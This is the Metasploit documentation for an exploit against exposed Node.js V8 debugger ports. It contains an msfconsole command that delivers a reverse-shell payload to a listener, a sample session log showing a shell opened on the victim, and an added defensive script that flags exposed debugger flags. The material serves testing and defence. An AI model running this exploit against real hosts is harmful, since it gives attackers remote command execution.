GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/misc/nodejs_v8_debugger.md

Vulnerable Application

Current and historical versions of Node.js (or any JavaScript environment based on the V8 engine) include the V8 debugger and could be exploitable if configured to expose the debugger port on an untrusted interface.

Install a version of node using any of the normal methods:

Alternatively, use the standard node Docker containers as targets:

$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858

(Others at https://hub.docker.com/_/node/)

Tested on Node 7.x, 6.x, 4.x
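
A defender can look for the exposure described above by checking how Node processes were started. The following is an added example, not part of the Metasploit module documentation: it parses process command lines and flags debugger options bound to a non-loopback address. The function names and sample process lines are constructed for illustration, and 9229 is the default `--inspect` port.

```javascript
// Added example (not from the Metasploit docs): flag Node.js processes whose
// debugger flag binds to a non-loopback address. Input lines are "PID ARGS".
const LOOPBACK = new Set(['127.0.0.1', 'localhost', '::1', '[::1]']);
const DEBUG_FLAG = /^--(debug|inspect)(?:-brk)?(?:=(.+))?$/;
const DEFAULT_PORT = { debug: 5858, inspect: 9229 };
const TAKES_VALUE = new Set(['-r', '--require']); // options followed by a value

// Parse "[host:]port" or a bare host; bracketed IPv6 literals stay whole.
function parseBind(value) {
  if (!value) return { host: null, port: null };
  if (/^\d+$/.test(value)) return { host: null, port: Number(value) };
  const m = /^(\[[^\]]+\]|[^:]+)(?::(\d+))?$/.exec(value);
  return m ? { host: m[1], port: m[2] ? Number(m[2]) : null }
           : { host: value, port: null };
}

// One finding per debugger flag that precedes the script path.
function auditLine(line) {
  const [pid, exe, ...args] = line.trim().split(/\s+/);
  if (!exe || !/(^|\/)(node|nodejs)$/.test(exe)) return [];
  const findings = [];
  for (let i = 0; i < args.length; i++) {
    const arg = args[i];
    if (!arg.startsWith('-')) break; // script path reached: the rest is app argv
    if (TAKES_VALUE.has(arg)) { i++; continue; }
    const m = DEBUG_FLAG.exec(arg);
    if (!m) continue;
    const { host, port } = parseBind(m[2]);
    // Assumption: no explicit host means the runtime's default bind; verify it.
    const status = host === null ? 'default-bind'
      : LOOPBACK.has(host.toLowerCase()) ? 'loopback' : 'exposed';
    findings.push({ pid: Number(pid), flag: arg, host,
      port: port === null ? DEFAULT_PORT[m[1]] : port, status });
  }
  return findings;
}
const auditProcessList = (lines) => lines.flatMap(auditLine);

// Constructed sample lines in the shape of `ps -eo pid,args` output.
const SAMPLE_PS = [
  '4121 /usr/local/bin/node --debug=0.0.0.0:5858 server.js',
  '4130 node --inspect=127.0.0.1:9229 worker.js',
  '4155 node --debug-brk=5859 job.js',
  '4170 node app.js --debug=0.0.0.0:5858',
  '4188 node -r dotenv/config --inspect=[::]:9230 api.js',
  '4201 python3 manage.py --debug=0.0.0.0:5858',
];
console.log(auditProcessList(SAMPLE_PS).filter((f) => f.status === 'exposed'));
```

Flags passed through the `NODE_OPTIONS` environment variable do not appear in the argument list, so pair this with a check of listening sockets on the host.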

Verification Steps

  1. Run a node process exposing the debug port

node --debug=0.0.0.0:5858

  2. Exploit it and catch the callback:

msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit"

(If using Docker hosts as targets for testing, ensure that the LHOST address is reachable from the container.)

Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity (such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.

Scenarios

Example Run (Node 7.x)

Victim:

$ node --version
v7.10.0
$ node --debug=0.0.0.0:5858
(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
Debugger listening on 0.0.0.0:5858
> (To exit, press ^C again or type .exit)

Attacker:

msf exploit(nodejs_v8_debugger) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 127.0.0.1:5858 - Sending 745 byte payload...
[*] 127.0.0.1:5858 - Got success response
[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700
id
(redacted)